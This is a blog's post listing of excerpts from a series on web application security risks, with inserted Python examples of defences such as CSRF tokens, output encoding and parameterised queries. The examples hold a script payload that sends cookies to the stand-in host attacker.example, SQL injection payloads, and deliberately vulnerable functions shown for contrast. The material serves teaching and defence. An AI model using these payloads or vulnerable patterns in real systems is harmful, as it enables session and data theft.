Mar 11, 2014
This Tuesday, March 4, 2014, my team held its Coding Dojo. Here is a short summary. How the day went: The main goal of the day was to discover AngularJS. Alongside the masters of ceremonies, Alvin and Alexis, I had twelve highly motivated participants with me. After a breakfast
Jan 29, 2014
Description: If a user is redirected or forwarded to a page whose address comes from an unverified input, an attacker can manipulate the target URL. This attack is used to send a user to a malicious website through a website with a trusted domain name (phishing) or to access an
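The check that closes this hole is the validation of the redirect target before the server issues the redirect. The following is an added example in Python (the series is Java-oriented, but the rule is the same in a servlet), not code from the original post: only site-absolute paths and https URLs on an allow-listed host are forwarded, and everything else falls back to a safe page. The host names and the `safe_redirect_target` helper are assumptions made for the example; the tricky inputs it rejects (scheme-relative `//evil.example`, backslash variants, userinfo such as `https://bank.example@evil.example`, `javascript:` and control characters) are the forms an attacker actually tries against naive "starts with /" or "contains our domain" checks.

```python
from urllib.parse import urlsplit

# Assumption for this example: hosts the (hypothetical) bank site treats as its own.
TRUSTED_HOSTS = {"bank.example", "www.bank.example"}


def safe_redirect_target(target: str, fallback: str = "/") -> str:
    """Return `target` if it stays on our site, otherwise `fallback`.

    Accepted: a site-absolute path ("/account") or an absolute https URL
    whose host is in TRUSTED_HOSTS.  Rejected: other hosts, other schemes
    (http, javascript:, data:), scheme-relative "//evil.example" forms,
    backslash variants and userinfo tricks ("https://bank.example@evil.example").
    """
    if not target:
        return fallback
    candidate = target.strip()
    # Control characters or whitespace inside the URL mean tampering
    # (or an attempt at header injection): never forward them.
    if any(ord(ch) < 0x21 for ch in candidate):
        return fallback
    # Browsers treat "\" like "/" in URLs, so "/\evil.example" is really
    # "//evil.example"; normalise before parsing so the check sees what
    # the browser will see.
    candidate = candidate.replace("\\", "/")
    try:
        parts = urlsplit(candidate)
    except ValueError:  # e.g. malformed IPv6 brackets
        return fallback
    if not parts.scheme and not parts.netloc:
        # Relative reference: allow a single leading slash only.
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return fallback
    if parts.scheme.lower() != "https":
        return fallback
    if "@" in parts.netloc:  # userinfo: the real host is after the "@"
        return fallback
    host = (parts.hostname or "").lower()
    if host not in TRUSTED_HOSTS:
        return fallback
    return candidate
```

In a handler, the result of `safe_redirect_target(request.args.get("next"))` is the only value ever passed to the redirect; the raw parameter is never used. A stricter design avoids the problem entirely by passing an index into a server-side table of allowed destinations instead of a URL.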
Jan 28, 2014
Description: Known software vulnerabilities are available to everyone on the Internet. If an attacker learns which components you use, they can look up these vulnerabilities and find a way to exploit them. Examples: Somehow, an attacker found out my bank's website uses Apache web server version 1.3.22 on
Jan 14, 2014
Description: An attacker makes your browser send a request to a website you are authenticated on, so that an operation is executed without your formal approval. Attackers usually rely on a page they control (an XSS flaw in the target site is another way) to make your browser send this malicious request, but many other ways exist to achieve the same goal. Examples: Every month, to pay
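The standard defence is a secret the attacker's page cannot obtain: the browser attaches the session cookie automatically, but a token embedded in the legitimate form is not readable cross-origin, so a forged request arrives without it. The block below is an added example in Python, not code from the original post. It issues a stateless token bound to the session with an HMAC (`nonce.mac`), checks it in constant time, and refuses the transfer when the token is missing, forged, or taken from the attacker's own session. `SERVER_KEY`, the session ids and the `handle_transfer` endpoint are assumptions for the example.

```python
import hashlib
import hmac
import secrets

# Assumption: in a real deployment this key is loaded from configuration,
# not generated at import time (a restart would invalidate every open form).
SERVER_KEY = secrets.token_bytes(32)


def _mac(session_id: str, nonce: str) -> str:
    # The NUL separator keeps "ab"+"c" and "a"+"bc" from colliding.
    message = session_id.encode("utf-8") + b"\0" + nonce.encode("ascii")
    return hmac.new(SERVER_KEY, message, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id: str) -> str:
    """Token = nonce.MAC(server key, session id, nonce).

    Embedded in the form as a hidden field.  It is bound to the session, so a
    token the attacker obtains in their own session does not verify against
    the victim's, and the server stores nothing per token.
    """
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = _mac(session_id, nonce)
    # Constant-time comparison: the check must not leak the MAC byte by byte.
    return hmac.compare_digest(mac.encode("utf-8"), expected.encode("ascii"))


def handle_transfer(session_id: str, form: dict):
    """State-changing endpoint: the session cookie alone must not authorise it."""
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "CSRF token missing or invalid"
    return 200, f"transferred {form['amount']} to {form['to']}"
```

The token only protects requests that the server actually checks; GET handlers that change state have no form to carry it and must be turned into POST first. The `SameSite` cookie attribute is a complementary browser-side control, not a replacement for the token.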
Dec 09, 2013
Description: In a web application with different user roles, authentication is not enough. Each request must be checked against the user's role to ensure the user is authorized to use the requested function or access the requested page. Examples: On my bank's website, the clerk has a link in
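Removing the link from the customer's menu is not a control, because the URL behind it can simply be typed. The check has to live with the function that is called. The following is an added example in Python, not code from the original post: a `requires_role` decorator enforces the role on every call, and a minimal router shows that a customer (or an anonymous caller) requesting the clerk-only page gets a 403 whether or not a link was shown. The roles, account data and routes are assumptions for the example; which user owns which account is a separate, object-level check not covered here.

```python
from functools import wraps


class Forbidden(Exception):
    """Raised when the caller's role does not allow the requested function."""


class User:
    def __init__(self, name, role):
        self.name = name
        self.role = role


def requires_role(*allowed_roles):
    """Server-side role check bound to the handler itself, not to the menu."""
    def decorator(handler):
        @wraps(handler)
        def guarded(user, *args, **kwargs):
            # Deny by default: anonymous callers and unknown roles are refused.
            if user is None or user.role not in allowed_roles:
                raise Forbidden(
                    f"{handler.__name__} requires one of {sorted(allowed_roles)}")
            return handler(user, *args, **kwargs)
        return guarded
    return decorator


# Constructed data for the example.
ACCOUNTS = {101: ("alice", 1200), 102: ("bob", 50), 103: ("carol", 9800)}


@requires_role("clerk")
def list_all_accounts(user):
    """Clerk-only page: every account in the branch."""
    return sorted(ACCOUNTS)


@requires_role("clerk", "customer")
def account_summary(user, account_id):
    owner, balance = ACCOUNTS[account_id]
    return {"account": account_id, "owner": owner, "balance": balance}


def dispatch(user, path):
    """Minimal router: a typed URL reaches the guarded handler, never a bare one."""
    routes = {"/admin/accounts": list_all_accounts}
    handler = routes.get(path)
    if handler is None:
        return 404, None
    try:
        return 200, handler(user)
    except Forbidden as exc:
        return 403, str(exc)
```

In a servlet application the same effect is obtained with security constraints in `web.xml` or framework annotations on the handler, with the important property being the same: the rule is declared once, next to the function, and evaluated on every request.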
Nov 18, 2013
Description: We have seen in the previous articles that an experienced attacker can easily intercept data in transit (e.g. on a public Wi-Fi hotspot) or gain access to data stored in your database (e.g. using SQL injection). If the stolen information is sensitive (password, credit card number, personal
Nov 14, 2013
Description: Nowadays, besides the operating system and the JRE, most Java applications are built on third-party frameworks, open-source or proprietary. Moreover, a web application is deployed on an application server (or a servlet container). All these components represent many potential risks an attacker can exploit if
Nov 04, 2013
Description: The application exposes a direct reference (functional identifier, database key, file path…) to a resource. From that direct reference, an attacker can guess other direct references and access other resources. Usually, you will find direct references in links and selection lists (drop-down lists, radio buttons and checkboxes)
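Two controls address this: stop exposing the database key at all (an indirect reference map, where each session hands out opaque tokens that only it can resolve), and check ownership on the server even when a key does arrive. The block below is an added example in Python, not code from the original post, showing the flawed lookup next to the hardened one. The account table, the session model and the `ReferenceMap` class are assumptions for the example.

```python
import secrets

# Constructed data: real database keys and their owners.
ACCOUNTS = {
    4711: {"owner": "alice", "balance": 1200},
    4712: {"owner": "bob", "balance": 50},
    4713: {"owner": "carol", "balance": 9800},
}


class ReferenceMap:
    """Per-session map between opaque references and real database keys.

    The browser only ever sees the opaque side, so changing 4711 to 4712
    in the URL is impossible: a reference this session never issued
    resolves to nothing, and a reference from another session is unknown.
    """

    def __init__(self):
        self._to_direct = {}
        self._to_indirect = {}

    def indirect(self, direct_id):
        if direct_id not in self._to_indirect:
            ref = secrets.token_urlsafe(12)  # unguessable, per session
            self._to_indirect[direct_id] = ref
            self._to_direct[ref] = direct_id
        return self._to_indirect[direct_id]

    def direct(self, ref):
        return self._to_direct.get(ref)


class Session:
    def __init__(self, user):
        self.user = user
        self.refs = ReferenceMap()


def account_links(session):
    """Build the selection list with opaque references, never raw keys."""
    return {session.refs.indirect(key): acc["owner"]
            for key, acc in ACCOUNTS.items() if acc["owner"] == session.user}


def get_account_vulnerable(session, account_id):
    """The flawed version: trusts the direct key from the request as-is."""
    return ACCOUNTS.get(account_id)


def get_account(session, ref):
    """Hardened: resolve through the session map, then re-check ownership.

    The ownership check is defence in depth: even if a direct key leaks
    some other way, the server never hands out another user's record.
    """
    account_id = session.refs.direct(ref)
    if account_id is None:
        return None
    account = ACCOUNTS.get(account_id)
    if account is None or account["owner"] != session.user:
        return None
    return account
```

The map costs a little session memory, which is why many teams keep the plain key in the URL and rely on the ownership check alone; that is acceptable as long as the check is applied in every handler that takes a reference, including exports, downloads and APIs that were added later.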
Oct 28, 2013
Description: Cross-Site Scripting is a specific form of injection attack. The goal is to make a web browser execute arbitrary scripting code (JavaScript, ActionScript, ActiveX…), usually to steal personal information. Examples: Persistent XSS attack: The attacker's bank website offers a messaging service to communicate with the clerk. The
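The fix is output encoding chosen for the context the data lands in, not input filtering. The following is an added example in Python, not code from the original post: a stored message containing a script is rendered by a vulnerable template and by three context-aware encoders (HTML body, HTML attribute, JavaScript literal). The payload, the `attacker.example` host and the rendering functions are constructed for the example.

```python
import html
import json

# Constructed message the attacker stores through the messaging service.
# In the clerk's browser it would send the session cookie to the attacker.
STORED_PAYLOAD = (
    '<script>new Image().src="https://attacker.example/c?"'
    '+document.cookie</script>'
)


def render_message_vulnerable(author, body):
    """Interpolates user data straight into HTML: the stored script executes."""
    return f"<li><b>{author}</b>: {body}</li>"


def render_message(author, body):
    """HTML body context: escape &, <, >, quotes. The payload becomes inert text."""
    return f"<li><b>{html.escape(author)}</b>: {html.escape(body)}</li>"


def render_attribute(name, value):
    """HTML attribute context: always quote the value and escape quotes inside it,
    otherwise a value like `x" onmouseover="...` breaks out of the attribute."""
    return f'{name}="{html.escape(value, quote=True)}"'


def render_script_data(value):
    """JavaScript context: HTML escaping is wrong here (it would corrupt the
    string); serialise as JSON and neutralise "</" so a "</script>" inside the
    literal cannot close the real script element."""
    literal = json.dumps(value).replace("</", "<\\/")
    return f"<script>var message = {literal};</script>"
```

Modern template engines apply the HTML-body encoder by default; the attribute and script contexts are where hand-written templates most often get it wrong, and a `Content-Security-Policy` header limits the damage when one is missed.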
Oct 21, 2013
Description: The attacker steals the victim's credentials or any information that will help them impersonate the victim on your application. Examples: Client attack: To authenticate on my bank website, my password is very simple to remember: it's my birthdate. But I want to change it with my wife'
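This post and the sensitive data exposure post above share one practical measure on the server side: store passwords so that neither a database dump nor a guessable choice such as a birthdate is enough for the attacker. The block below is an added example in Python, not code from the original posts. It hashes passwords with a per-user salt and a slow key derivation (PBKDF2-HMAC-SHA256 from the standard library), verifies them in constant time, and rejects the kind of password the article describes (a bare date, or one built from facts about the user). The storage format, the iteration count and the `is_weak_password` rules are assumptions for the example.

```python
import base64
import hashlib
import hmac
import os

ALGORITHM = "pbkdf2_sha256"
# Work factor: chosen so one verification takes a fraction of a second;
# raise it as hardware gets faster (assumed value for the example).
ITERATIONS = 600_000


def hash_password(password: str) -> str:
    """Salted, iterated hash: a dumped table yields no reusable secret,
    and identical passwords produce different records."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "$".join([
        ALGORITHM,
        str(ITERATIONS),
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    ])


def verify_password(stored: str, password: str) -> bool:
    try:
        algorithm, iterations, salt_b64, digest_b64 = stored.split("$")
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
        iterations = int(iterations)
    except ValueError:
        return False
    if algorithm != ALGORITHM:
        return False
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    # Constant-time comparison so timing does not reveal matching prefixes.
    return hmac.compare_digest(actual, expected)


def is_weak_password(password: str, personal_terms=()) -> bool:
    """Reject short passwords, bare digit strings (birthdates) and passwords
    containing known facts about the user (names of relatives, etc.)."""
    if len(password) < 12:
        return True
    if password.isdigit():
        return True
    lowered = password.lower()
    return any(term and term.lower() in lowered for term in personal_terms)
```

Hashing protects the stored copy only; the credential in transit still needs TLS, and a login form that accepts unlimited attempts still lets the attacker try every birthdate, so rate limiting or lockout belongs next to this code.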
Oct 11, 2013
Description: The attacker sends untrusted data that is injected into the targeted application to change its behaviour. The goal of this attack is usually to steal data, but it can also be used to delete or corrupt your data or cause a denial of service. Example: I'm connected
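The canonical case is SQL injection, and the fix is to keep data out of the query text by binding parameters. The following is an added example in Python with an in-memory SQLite database, not code from the original post: the same lookup written by string concatenation and with a parameterised query, run against a tautology payload (returns every row) and a UNION payload (reads the schema out of `sqlite_master`, i.e. data theft). The table, its rows and the payloads are constructed for the example.

```python
import sqlite3


def build_database():
    """Constructed in-memory table standing in for the bank's accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (id INTEGER PRIMARY KEY, owner TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts (owner, balance) VALUES (?, ?)",
        [("alice", 1200), ("bob", 50), ("carol", 9800)])
    return conn


def accounts_for_vulnerable(conn, owner):
    """Builds the query by concatenation: the input becomes part of the SQL."""
    query = f"SELECT owner, balance FROM accounts WHERE owner = '{owner}'"
    return conn.execute(query).fetchall()


def accounts_for(conn, owner):
    """Parameterised query: the input is bound as a value, never parsed as SQL."""
    return conn.execute(
        "SELECT owner, balance FROM accounts WHERE owner = ?", (owner,)).fetchall()


# Constructed payloads.
# Turns the WHERE clause into a tautology: every account comes back.
TAUTOLOGY = "x' OR '1'='1"
# Appends a second SELECT to read the schema; "--" comments out the closing quote.
UNION_SCHEMA = "x' UNION SELECT sql, 0 FROM sqlite_master --"
```

The parameterised version is not only safer but also what the JDBC `PreparedStatement` does in the Java world the series targets; the same discipline applies to LDAP, XPath and OS command construction, where the "bind" is a library API that takes arguments separately from the command.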
Oct 10, 2013
When starting a new web application, the security risks are sadly often underestimated by everyone (developers, architects, IT, managers…). Web applications are more exposed to attacks than standalone applications, as they usually expose a service over a network to a potentially large population of users. Of course, the risk
Feb 22, 2008
To test web services, there are not many open-source solutions. I suggest two, depending on the kind of tests you want to run. Apache JMeter is the well-known and recognised open-source testing tool. It is generally used to test performance and scalability
Feb 22, 2008
Anyone who has already run load tests knows that the client machine (the one simulating the users) is as important as the server under test. If the client machine is unable to correctly simulate the desired number of users because of a processor that is too weak, a lack of